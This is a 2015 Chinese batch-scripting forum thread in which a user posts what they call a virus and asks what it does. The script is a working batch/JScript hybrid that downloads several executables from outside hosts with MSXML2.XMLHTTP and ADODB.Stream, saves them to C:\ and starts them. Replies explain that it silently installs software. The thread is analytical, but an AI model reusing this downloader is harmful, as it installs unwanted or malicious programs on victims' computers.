Board logo

标题: [其他] 谁能解释一下这个病毒批处理代码的意思 [打印本页]

作者: 注册个几8    时间: 2015-8-16 18:27     标题: 谁能解释一下这个病毒批处理代码的意思

本帖最后由 注册个几8 于 2015-8-16 18:44 编辑

代码如下:
  1. echo=1/*>nul
  2. @cls
  3. @echo off
  4. call :http "http://down.ssddl.com/xzrpdf_70247.exe" "c:\xzrpdf_70247.exe"
  5. call :http "http://down.ssddl.com/zupmopn_30394.exe" "c:\zupmopn_30394.exe"
  6. start c:\xzrpdf_70247.exe
  7. start c:\zupmopn_30394.exe
  8. call :http "http://down.ssddl.com/jKINSTALLERS_60_201153.exe" "c:\jKINSTALLERS_60_201153.exe"
  9. call :http "http://down.ssddl.com/t10021.exe" "c:\t10021.exe"
  10. call :http "http://down.ssddl.com/setupX071_32.exe" "c:\setupX071_32.exe"
  11. call :http "http://down.yinyue.fm/open/setup_3102-22942.exe" "c:\setup_3102-22942.exe"
  12. call :http "http://down.ssddl.com/setupX_2002_221.exe" "c:\setupX_2002_221.exe"
  13. start c:\jKINSTALLERS_60_201153.exe
  14. start c:\t10021.exe
  15. start c:\setupX071_32.exe
  16. start c:\setup_3102-22942.exe
  17. start c:\setupX_2002_221.exe
  18. goto :eof
  19. :http
  20. cscript -nologo -e:jscript "%~f0" "%~1" "%~2"
  21. goto :eof
  22. */
  23. var iLocal,iRemote,xPost,sGet;
  24. iLocal =WScript.Arguments(1);
  25. iRemote = WScript.Arguments(0);
  26. iLocal=iLocal.toLowerCase();
  27. xPost = new ActiveXObject("MSXML2.XMLHTTP.3.0");
  28. xPost.Open("GET",iRemote,0);
  29. xPost.Send();
  30. sGet = new ActiveXObject("ADODB.Stream");
  31. sGet.Mode = 3;
  32. sGet.Type = 1;
  33. sGet.Open();
  34. sGet.Write(xPost.responseBody);
  35. sGet.SaveToFile(iLocal,2);
  36. sGet.Close();
复制代码

作者: 707093864    时间: 2015-8-16 19:14

应该是在指定的网站上下载一系列安装包进行安装,貌似是静默安装
作者: CrLf    时间: 2015-8-16 19:18

我靠,还有这么高档的病毒
作者: CrLf    时间: 2015-8-16 19:22

就是下一堆exe来安装咯
让人惊讶的是不光结构很好,而且居然还用了混编...
作者: chouxia    时间: 2015-8-17 09:55

玩病毒的也讲经济效益哈
科技是第一生产力啊




欢迎光临 批处理之家 (http://bbs.bathome.net/) Powered by Discuz! 7.2